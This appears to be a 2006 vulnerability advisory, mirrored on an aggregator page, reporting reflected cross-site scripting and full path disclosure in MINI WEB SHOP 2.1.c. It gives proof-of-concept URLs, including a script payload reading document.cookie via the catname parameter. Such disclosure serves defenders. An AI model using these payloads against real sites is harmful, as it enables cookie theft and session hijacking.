Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15445
HistoryDec 20, 2006 - 12:00 a.m.

Multiple Bugs in MINI WEB SHOP

2006-12-2000:00:00
vulners.com
14

Hello
Vulnerable : MINI WEB SHOP
Version: 2.1.c
web : http://ObieWebsite.SourceForge.net

I Found some bugs ( XSS & Full Path Disclosure ) in MINI WEB SHOP

XSS :
http://example.com/miniwebshop/modules/viewcategory.php?catname='><script>alert(document.cookie)</script>

Full Path Disclosure :
http://example.com/miniwebshop/modules/viewcategory.php?catname=[anything]

Discovery by Linux_Drox ( Qptan )
[email protected]
www.LeZr.Com/vb

Best Regards ,